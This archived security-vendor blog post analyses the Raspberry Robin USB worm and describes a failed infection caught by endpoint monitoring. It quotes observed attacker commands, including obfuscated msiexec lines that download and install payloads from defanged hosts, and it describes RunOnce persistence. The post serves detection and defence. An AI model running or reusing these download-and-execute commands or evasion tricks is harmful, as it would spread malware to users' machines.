Evolution of USB-Borne Malware, Raspberry Robin
By Harlan Carvey
Published: 2023-09-07 · Archived: 2026-04-10 03:00:51 UTC
Due to our extensive and diverse customer base, Huntress “sees” a good bit of the same malicious activity others are seeing,
albeit often from a slightly different perspective. 
One example of this is, not long ago, Huntress analysts investigated an INC ransom group incident, one that at the time had
only been recently observed by others. In other cases, Huntress analysts may observe elements of attacks or campaigns that
are slightly different from what other, similar firms may experience.
Since July 2022, Huntress has observed the USB device-borne Raspberry Robin malware across our customer base off and
on. In that time, we’ve seen different variations, as well as an evolution of the response to the malware. While there has been
no regular cadence of infections, it’s clear that a combination of human-managed EDR and human-managed antivirus
provides a great deal of detection and response capabilities in the face of such infections.
What Is Raspberry Robin?
Raspberry Robin is malware that has been described as a “USB worm”, as USB devices are the primary delivery mechanism
that has been observed to this point. Users interact with a file on a USB device, and then their system becomes infected with
the Raspberry Robin malware. 
Raspberry Robin has been seen to be part of a much larger malware ecosystem and acts as a possible precursor to additional
ransomware deployment. However, unlike other worms out there, this malware has not been observed propagating to other
endpoints on its own.
https://www.huntress.com/blog/evolution-of-usb-borne-malware-raspberry-robin
Page 1 of 4

Raspberry Robin Infection Chain
The typical Raspberry Robin infection chain follows what has previously been shared; the user connects the infected USB
device and double-clicks the Windows shortcut/LNK file, causing an apparent “junk” file containing an MSIExec command
to be launched. 
Huntress analysts have observed several variations of commands embedded within Windows shortcut/LNK files, including:
tYPeWycz.Cfg|CMDcMd<xPhfk.sav!ComSpEc!<xnjhM.v!coMSPEc!<FN.iCo
These commands redirect or “pipe” the contents of the “junk” files into the command processor, denoted by either “cmd” or
“!comspec!”. More recently, Huntress observed a command line that contained a significant amount of ‘white space’ with
the command line itself; that is to say, there were a number of carriage returns and tab characters included in the command
line, likely in an attempt to evade detection.
The user double-clicking the Windows shortcut/LNK file has been observed within EDR telemetry as an Explorer.exe
process associated with the name of the shortcut file:
EXPLORER "USB DISK"EXPLORER "USB DRIVE"expLorER "ADATA UFD"EXPlOrEr "HBCD 15_2"
When the “junk” file is processed by the command processor, a Microsoft Installer Executable (MSIExec) command is
launched, which downloads a remote file to the endpoint. 
Huntress has observed a number of similarities in these commands, and in particular, the remote resources accessed via the
command. For example, as with previous commands in the infection process, the command itself is of mixed case,
alternating between upper- and lower-case letters. The domain accessed for the resource is most often three characters long,
and the top-level domain is two characters. Finally, the port accessed has been 8080. Examples of commands observed by
Huntress analysts are as follows:
msiexec.exe -qUIeT /I HTtp://5g7[.]AT:8080/y8yNq/iZR/whjn/Ax6q80a/Y1Z5/j/fs/VTSAO?xxxx <redacted>
FUBb=jxbCAQtnu"msIeXeC YliNpQ=YgYdWQ /q VZFfOPaC=gwiIp jE=jnlD -fV
"hTtP://FxB[.]tw:8080/AMBG/9FlMJgrIkRjJfVw2bWSju/Machine=User"MsIEXEc HbeLpYii=TPvbe
WyWsZiUBG=mpV /I "hTTP://eJK[.]bz:8080/BC/A3Y7fxb0oDMXkstfQGYd/Machine?User" -qUIeT ZS=xKG
Kvbzhtp=UpyZqTff vQtPdg=mWbmSIExeC zkrZ=CtX /qN wZd=VgaoYGD /PACKAgE
"HtTP://jRx[.]fR:8080/yKyC/bSis/yUp0OSNBN0eTTIjpK/Machine=User" dJYsmgC=pBVHKGG ieJ=SIYm
Pm=cdFDvckTmSiexeC
\tBIQGitHuP=OsdHlvG\tjYRdyzQwc=Hwr\t/fV\t\"hTTp://ZjC[.]bz:8080/AoA3LSHNJCaFIM/hMgkh/62oyni/<redacted>
EnksxM=KdVZ vTECB=bHLmevjk -QUIET\tWx=iY LdP=VEfGlpn\tMcxWT=zTtlOkU
Finally, persistence is established by creating a value beneath the user’s RunOnce Registry key. As Microsoft stated:
Entries in the RunOnce key delete the registry entry prior to launching the executable content at sign-in. Raspberry Robin
re-adds this key once it is successfully running to ensure persistence. After the initial infection, this leads to RunOnce.exe
launching the malware payload in timelines. Raspberry Robin also temporarily renames the RunOnce key when writing to it
to evade detections.
As a result, the malware persists by recreating a value beneath the user’s RunOnce Registry key each time the value is
removed from the key and executed.
Hunting for Raspberry Robin
https://www.huntress.com/blog/evolution-of-usb-borne-malware-raspberry-robin
Page 2 of 4

During August 2023, Huntress analysts observed a Raspberry Robin infection attempt—one that failed to complete.
Notification of the infection attempt was observed via detections based on Huntress EDR telemetry and Managed Microsoft
Defender alerts. The following table illustrates a timeline excerpt of the events as the infection attempt unfolded:
12:20:32Z
User connects “USB Disk 3.0” device “USB\VID_13FE&PID_6300\070393698CF56A96” to the endpoint; a lookup
identifies this device as a Phison Electronics Corp device, SN: 070393698CF56A96
12:21:12Z
User double-clicks “USB DISK.lnk”, launches “cmd /C!coMSPEc!<FN.iCo”, which runs msiexec.exe (in this case,
“mSiexeC”) to download and install a file from http://ZjC[.]bz:8080. Huntress detected the Raspberry Robin execution
pattern.
12:23:06Z
Windows Defender detects downloaded file “C:\ProgramData\Rmbizw\felgs.evmg” and submits it to the Defender cloud. 
12:24:06Z
Windows Defender detects the submitted file as “Trojan:Win32/Wacatac.H!ml”, with persistence established via the user’s
RunOnce Registry key. The file is successfully removed.
12:26:26Z
MsiInstaller process fails; message, “WhOYztO -- Installation failed.”
At the time of the Huntress investigation of the Raspberry Robin execution pattern detection, the
“C:\ProgramData\Rmbizw\felgs.evmg” file was not found on the endpoint. Further, there was no indication of
RunOnce.exe executing the malware observed within the EDR telemetry for the endpoint.
Data from the endpoint Windows Event Logs indicates that the USB device in question was connected to the endpoint
repeatedly during January 2023, the earliest observed time being on January 6, 2023. Each time the device was connected to
the endpoint, Windows Defender detected the file “D:\USB DISK.lnk” as “Trojan:Win32/VintageDynamo.A”. The
earliest available MsiInstaller message within the Windows Event Log data timeline is from March 28, 2022, which
significantly pre-dates the January 6, 2023 connection of the “USB Disk 3.0” device; however, there are no MsiInstaller
events associated with a Raspberry Robin infection attempt until August 21, 2023. This likely indicates that the USB device
was infected prior to January 6, 2023, and supports the understanding that the user must double-click the Raspberry Robin
Windows shortcut file on the USB device to activate the infection.
Conclusion
https://www.huntress.com/blog/evolution-of-usb-borne-malware-raspberry-robin
Page 3 of 4

Huntress Managed EDR and Managed Microsoft Defender work together to provide overlapping layers of endpoint
protection. Applying a combination of Managed EDR and Managed Microsoft Defender enables both active defense against
threats as they take place and visibility over how these threats appear.
As shown in the above example, pivoting from Managed AV detections can reveal an infection chain, highlighting other
touchpoints for analysts to look for in the event Managed AV fails in the future. Through continuous analysis and review of
alerting, and digging into the context surrounding a given alarm when it fires, network defenders can gain greater
perspective and awareness of how events take place and what additional mitigations or similar should be applied to ensure
across-the-board coverage against adaptive, persistent threats.
Source: https://www.huntress.com/blog/evolution-of-usb-borne-malware-raspberry-robin
https://www.huntress.com/blog/evolution-of-usb-borne-malware-raspberry-robin
Page 4 of 4